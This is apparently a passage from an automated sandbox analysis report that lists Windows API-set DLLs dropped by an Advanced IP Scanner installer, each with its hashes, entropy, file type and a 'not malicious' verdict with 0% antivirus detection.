Category:	dropped
Size (bytes):	20672
Entropy (8bit):	6.988142648004873
Encrypted:	false
SSDEEP:	384:0Ok1JzNcKSIxW2hWFSUA0GftpBjluF3sBlvQyURz8o:0pcKSCUi++rvU2o
MD5:	39047E168FFBDD19185504633D6ECA29
SHA1:	FE3423689EFEDADA19C7DEC3D5DD077A057BF379
SHA-256:	611B3E36AD3E0045AB4170A5D4E2D05FD2A26DDE2F7B09EA51F4264E263A544B
SHA-512:	8B7D38726E302CDCF5A296E50CCC969B2B122432B93E2B5D1D1F4C1B6C2B3A9B64AF79BB65A7A9EAC31F563AE60934458F9316DD5CBB071FB0A3AD180FAC6103
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......~.....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.000917619737006
Encrypted:	false
SSDEEP:	192:QgxDfIeJWVghW/c7l9YOCAs/nGfe4pBjSfxyWNArXVWQ4mWgBHqnaj9RlS6V6Qg:JDfIeJW2hWk7QA0GftpBjxdBHlBRAky
MD5:	C2EAD5FCCE95A04D31810768A3D44D57
SHA1:	96E791B4D217B3612B0263E8DF2F00009D5AF8D8
SHA-256:	42A9A3D8A4A7C82CB6EC42C62D3A522DAA95BEB01ECB776AAC2BFD4AA1E58D62
SHA-512:	C90048481D8F0A5EDA2EB6E7703B5A064F481BB7D8C78970408B374CB82E89FEBC2E36633F1F3E28323FB633D6A95AA1050A626CB0CB5EC62E9010491AAE91F4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18112
Entropy (8bit):	7.0782836442636174
Encrypted:	false
SSDEEP:	384:MZeW2hWngbCA0GftpBjPEGVlvQyURz87X:3n8ixEQvU2L
MD5:	7697F94ED76B22D83D677B999EDFC2E1
SHA1:	42AFB5B8E76B8B77D845156B7124CC3E0C613F91
SHA-256:	50FD585270FA79FD056EC04B6991D0E65CCA28C1116834A59D5591F8D8C2C214
SHA-512:	1EF120BAA532692D22F8939D9F149035E38DA6B65B889BA6CCB7858596718D569B0B9B35AD3609DE9DAF229553254966BF3D5A6ABC4AF1FF56732CE8560B31C8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18112
Entropy (8bit):	7.072469017642331
Encrypted:	false
SSDEEP:	384:mG1W2hWhSUA0GftpBjy6oNxll7PedGitM/:mGTgio6CJkGcG
MD5:	FDF0B4BF0214585E18EE2F6978F985B0
SHA1:	0FE247F8CCA0C04729135EE612FBFCED92D59D9D
SHA-256:	CF42C1215695579ADE1842246EC43DA9A9B28E8107957C0C340CE3BA9F689584
SHA-512:	D0A249C230520538E8C2759CC0A41444C543DABD6347C8A8231C587EBBA28905AD2DF5E5D6437881C7A02F6DE6212A719ACCA2F6D30F63F8D7A21A26921A1807
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.021897050678374
Encrypted:	false
SSDEEP:	384:5yMvJW2hW2gbCA0GftpBjMv3ulvQyURz8n:5yMvn88ikEvU2n
MD5:	687533A89B43510CCE4D8B2ECB261AA0
SHA1:	4004BA63880A92042C106FF6A549C6F5F69CE05D
SHA-256:	E7272FF3B00508732896BF96F8DAB5AD32FE4531746AB1C228C315F1B4D48156
SHA-512:	6A61DD13939BF61342278EFFA07D2654219032F9523D3D552275BD60BD3B125DAD13737924D33F6619C5A7CCACE008B37C3330451411D3BD09E1D2B5064F9AAC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......A....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20672
Entropy (8bit):	6.936138213943514
Encrypted:	false
SSDEEP:	384:wdv3V0dfpkXc0vVafW2hWqSUA0GftpBjjQjclvQyURz82u6:wdv3VqpkXc0vVaBziRvU22u6
MD5:	88C4CA509C947509E123F22E5F077639
SHA1:	AE837C556FF23B9E166288A11E409D21BDDDA4ED
SHA-256:	0787FD3D9606B8614F9073C5F04CC6CB153BBF2992297CEBB8C537C066A78C9F
SHA-512:	3CCE8C4EA63019ADC6383D5DA7F5969B0B10A55CEEF29083E21F04D23377305325C5CB5F4656955F8ABB5A1E10BEEAC60808DE9D03A72462950469AE49768418
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......a.....@.............................V............ ...................<..............8............................................................................text...f........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.030340698171656
Encrypted:	false
SSDEEP:	384:/tZ34W2hWlgbCA0GftpBjx5C32lI663UG:w18i+66kG
MD5:	F6B4D8D403D22EB87A60BF6E4A3E7041
SHA1:	B51A63F258B57527549D5331C405EACC77969433
SHA-256:	25687E95B65D0521F8C737DF301BF90DB8940E1C0758BB6EA5C217CF7D2F2270
SHA-512:	1ACD8F7BC5D3AE1DB46824B3A5548B33E56C9BAC81DCD2E7D90FDBD1D3DD76F93CDF4D52A5F316728F92E623F73BC2CCD0BC505A259DFF20C1A5A2EB2F12E41B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................v............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.960490184684636
Encrypted:	false
SSDEEP:	192:nvj+UKIMFsWVghW/AvSx9YOCAs/nGfe4pBjSf3Ir9WNArXVWQ4mWSEqnajMHxxBB:7+UhW2hWISUA0GftpBjdrZolI663UU
MD5:	B9EA058418BE64F85B0FF62341F7099E
SHA1:	0B37E86267D0C6782E18F734B710817B8B03DA76
SHA-256:	653BE79FA676D052CCE60D743282018FAAAF22E15A3CB8F1EEE01F243D56B431
SHA-512:	EFAAC54C0C6648F666B58E0441315446FDBCB8544C3B9E2005482DE25E62E716D0C66DCB7A9CEDD7967FFC26E394AE9F1B1DFDCE1D4243CFDE737140D1C3D51D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................E............ ...................<..............8............................................................................text...U........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.0606914357897885
Encrypted:	false
SSDEEP:	192:B6awWVghW/d7l9YOCAs/nGfe4pBjSf/pjWNArXVWQ4mWgmqnajLQvTP+8jP9Tz8U:WW2hWF7QA0GftpBjQ9YlvQyURz8RG
MD5:	A20084F41B3F1C549D6625C790B72268
SHA1:	E3669B8D89402A047BFBF9775D18438B0D95437E
SHA-256:	0FA42237FD1140FD125C6EDB728D4C70AD0276C72FA96C2FAABF7F429FA7E8F1
SHA-512:	DDF294A47DD80B3ABFB3A0D82BC5F2B510D3734439F5A25DA609EDBBD9241ED78045114D011925D61C3D80B1CCD0283471B1DAD4CF16E2194E9BC22E8ABF278F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.97908669425612
Encrypted:	false
SSDEEP:	192:MGMWVghW/AvSx9YOCAs/nGfe4pBjSf6qy4X3WNArXVWQ4mWwiS21qnaj9RlS6VEX:iW2hWoSUA0GftpBjfHWbziS2lBRAkEX
MD5:	2886C75F8B9D3EFDF315C44B52847AEE
SHA1:	4FC75E39493B356F1F219798E3738DBC764281E4
SHA-256:	3DB27D95689F936B4591EBAD18173AD07FAC07D69D68EEFF06DEE158599D731F
SHA-512:	2931224106EEEA142664AEC9D1D5D028D15A14765BCE8674D34D67FC027F6FEFF3AF283F3D81B113E6EFCD42E6B4BD249E94E01C8F41B5211650F1775774B765
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......9+....@.............................9............ ...................<..............8............................................................................text...I........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.97635016555389
Encrypted:	false
SSDEEP:	384:UjcW2hWX7QA0GftpBju0dtTxZlBRAk9l3:yAwyi8or1RAO
MD5:	3B038338C1EB179D8EEE3883CF42BC3E
SHA1:	EA97CF2EE16EF2DF3766A40C6CE33C8BE5F683B2
SHA-256:	C17786E9031062F56E4B205F394A795E11EF9367B922763DDF391F2ACAB2E979
SHA-512:	1A6D8FC065237BF0DBBA18C777958522697B6BC2BE1B16586870A0C06178D65B521F66F522BF5636DF793E4AC8A2A3DE780B3C7062273A11F52A381EE851ECE6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......Ts....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22720
Entropy (8bit):	6.8330909328576315
Encrypted:	false
SSDEEP:	192:sYNpdkKBcyNWVghW/77l9YOCAs/nGfe4pBjSfCKZWNArXVWQ4mWuqnajMHxxBNT5:zuyNW2hWD7QA0GftpBjLKNplI663U4v
MD5:	5245F303E96166B8E625DD0A97E2D66A
SHA1:	1C9ED748763F1FF5B14B8C791A4C29DE753A96AB
SHA-256:	90A63611D9169A8CD7D030CD2B107B6E290E50E2BEBA6FA640A7497A8599AFF5
SHA-512:	AF51F341670F925449E69C4B5F0A82F4FC4EB32913943272C32E3F3F18EE43B4AFB78C0D7D2F965C1ABE6A0F3A368616DD7A4FB74D83D22D1B69B405AEF1E043
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@...........@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.969708578931716
Encrypted:	false
SSDEEP:	192:sWVghW/cgbXH9YOCAs/nGfe4pBjSf4AKWNArXVWQ4mWvMHqnajMHxxBNT0662ONh:sW2hWUgbCA0GftpBjQGEMHlI663Uh
MD5:	45C54A21261180410091CEFB23F6A5AE
SHA1:	80EEE466D086D30C61EAEFC559D57E5E64F56F61
SHA-256:	2B0FEA07DB507B7266346EAB3CA7EDE3821876AADC519DAF059B130B85640918
SHA-512:	4962F85C94162FE2E35979FFF4E4B3752F322C61D801419769916F5E3A0E0C406284D95C22709C690212D4572EB688D9311A8F85F17C4F5D1A5A9F00E732808C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......S....@............................."............ ...................<..............8............................................................................text...2........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20672
Entropy (8bit):	6.979229086130751
Encrypted:	false
SSDEEP:	384:kgq6nWm5C1W2hW7SUA0GftpBjAdlI663Um:k6nWm5CTqij66km
MD5:	AB8734C2328A46E7E9583BEFEB7085A2
SHA1:	B4686F07D1217C77EB013153E6FF55B34BE0AF65
SHA-256:	921B7CF74744C4336F976DB6750921B2A0960E8AA11268457F5ED27C0E13B2C8
SHA-512:	FD7E828F842DEABF2DCDCEA3E947DC3AA909C0B6A35C75FD64EDC63C359AB97020876E6C59AD335A2A166437FA65F57433F86C1C2FE10A34B90D15D8592FE911
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......X....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.948212808065758
Encrypted:	false
SSDEEP:	192:579Y17aFBRAWVghW/FgbXH9YOCAs/nGfe4pBjSfyWNArXVWQ4mWuA3qnaj9RlS6b:OtW2hWdgbCA0GftpBjrpA3lBRAkJ
MD5:	39D81596A7308E978D67AD6FDCCDD331
SHA1:	A0B2D43DD1C27D8244D11495E16D9F4F889E34C4
SHA-256:	3D109FD01F6684414D8A1D0D2F5E6C5B4E24DE952A0695884744A6CBD44A8EC7
SHA-512:	0EF6578DE4E6BA55EDA64691892D114E154D288C419D05D6CFF0EF4240118C20A4CE7F4174EEC1A33397C6CD0135D13798DC91CC97416351775F9ABF60FCAE76
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......4....@.......................................... ...................<..............8............................................................................text...&........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.02455319040347
Encrypted:	false
SSDEEP:	192:wWVghW/4gbXH9YOCAs/nGfe4pBjSfIMYgWNArXVWQ4mWu5BXqnajL1dHx3tKrSwZ:wW2hWwgbCA0GftpBjRMNBtlXBtFwuWd
MD5:	E70D8FE9D21841202B4FD1CF55D37AC5
SHA1:	FA62FB609D15C8AD3B5A12618BCC50F0D95CDEA3
SHA-256:	E087F611B3659151DFB674728202944A7C0FE71710F280840E00A5C4B640632D
SHA-512:	BD38BDF80DEFD4548580E7973D89ED29E1EDD401F202C367A3BA0020678206DA3ACC9B4436C9A122E4EFC32E80DBB39EB9BF08587E4FEBC8F14EC86A8993BCC8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......./....@.............................e............ ...................<..............8............................................................................text...u........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29376
Entropy (8bit):	6.5989266511221745
Encrypted:	false
SSDEEP:	384:K47isbM4Oe5grykfIgTmLSW2hWPgbCA0GftpBjF17cylBRAkV8:X1Mq5grxfInqH8iBgoRAz
MD5:	D0D380AF839124368A96D6AA82C7C8AE
SHA1:	E2AC42F829085E0E5BEEA29FCFF09E467810A777
SHA-256:	06985D00BF4985024E95442702BBDB53C2127E99F16440424F3380A88883F1A5
SHA-512:	DAF3997922E18C0BE088A15209C9F01CC1DDA90972A6AADCF76DE867B85D34483AD5E138E3FA321C7140BF8E455C2B908D0A4DB6A9E35011786398656B886479
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................@...............................P.......,....@..............................+...........@...............6...<..............8............................................................................text....,.......................... ..`.rsrc........@.......2..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26816
Entropy (8bit):	6.632501498817798
Encrypted:	false
SSDEEP:	384:my+Kr6aLPmIHJI6/CpG3t2G3t4odXLhW2hWjgbCA0GftpBjpCjzTZlXBtFwLd:mZKrZPmIHJI6NT8irCXDyx
MD5:	809BC1010EAF714CD095189AF236CE2F
SHA1:	10DBC383F7C49DE17FC50E830E3CB494CC873DD1
SHA-256:	B52F2B9DE19D12B0E727E13E3DDE93009E487BFB2DD97FD23952C7080949D97E
SHA-512:	F72EC10A0005E7023187EF6CCEDF2AF81D16174E628369FB834AF78E4EF2F3D44BF8B70E9B894ABC6791D7B9720C62C52A697FF0ADE0EDDDCAA52B6F14630D1D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.....$...................@...............................P............@.............................. ...........@...............,...<..............8............................................................................text....".......$.................. ..`.rsrc........@.......(..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73408
Entropy (8bit):	5.811008103709619
Encrypted:	false
SSDEEP:	1536:nt2b2De5c4bFX2Jy2cvxXWpD9d3334BkZnkPgE79g:nw2De5c4bFX2Jy2cvxXWpD9d3334BkZ3
MD5:	1DD5666125B8734E92B1041139FA6C37
SHA1:	22E9566352E77AB15A917B45A86C0DC548431692
SHA-256:	D0FF5F6BB94961D4C17F0709297A6B5A5FA323C9AC82F4FE27187912B4B13CF3
SHA-512:	420B9184842ECD7969BF75F0D8A62569725624AE413C83EE3B6F26973318B4170287F657F2BE8DD3E7FC71264D69B2203E016D078615AD6E31E65033D5C59654
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................................................................@.............................8................................<..............8............................................................................text...H........................... ..`.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.961849079425489
Encrypted:	false
SSDEEP:	192:pYTRQqjd7NWVghW/RmgbXH9YOCAs/nGfe4pBjSf1wjWNArXVWQ4mW4C0zA7qnajP:2KcW2hW5mgbCA0GftpBjLKlvQyURz8x
MD5:	8F8A47617DFD829A63E3EC4AFF2718D9
SHA1:	1D7DC26BB9C78C4499514FB3529B3478AECF7340
SHA-256:	6D4A1AAD695A3451C2D3F564C7CC8D37192CD35539874DF6AE55E24847E51784
SHA-512:	D3B96B1F80C20DE58A4D4179177E1C1C2B460719968FBA42E1BA694D890342AAAB5A8C67E7FFDD126B2FC6D6A7B2408952279D8926B14BF2DF11740483867821
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......\r....@.............................x............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23232
Entropy (8bit):	6.854338104703726
Encrypted:	false
SSDEEP:	384:5b7hrKIW2hW6SUA0GftpBjoQt1TlI663UMp:5bNrKcziZzW66kMp
MD5:	AE3FA6BF777B0429B825FB6B028F8A48
SHA1:	B53DBFDB7C8DEAA9A05381F5AC2E596830039838
SHA-256:	66B86ED0867FE22E80B9B737F3EE428BE71F5E98D36F774ABBF92E3AACA71BFB
SHA-512:	1339E7CE01916573E7FDD71E331EEEE5E27B1DDD968CADFA6CBC73D58070B9C9F8D9515384AF004E5E015BD743C7A629EB0C62A6C0FA420D75B069096C5D1ECE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@......@.....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24768
Entropy (8bit):	6.784463110154403
Encrypted:	false
SSDEEP:	384:vUFVhjW2hWcgbCA0GftpBjH95mnlvQyURz8te:szC8iEvU2Y
MD5:	32D7B95B1BCE23DB9FBD0578053BA87F
SHA1:	7E14A34AC667A087F66D576C65CD6FE6C1DFDD34
SHA-256:	104A76B41CBD9A945DBA43A6FFA8C6DE99DB2105D4CE93A717729A9BD020F728
SHA-512:	7DAD74A0E3820A8237BAB48F4962FE43E5B60B00F003A5DE563B4CF61EE206353C9689A639566DC009F41585B54B915FF04F014230F0F38416020E08C8A44CB4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......h....@.............................a............0...............$...<..............8............................................................................text...q........................... ..`.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)

Download File

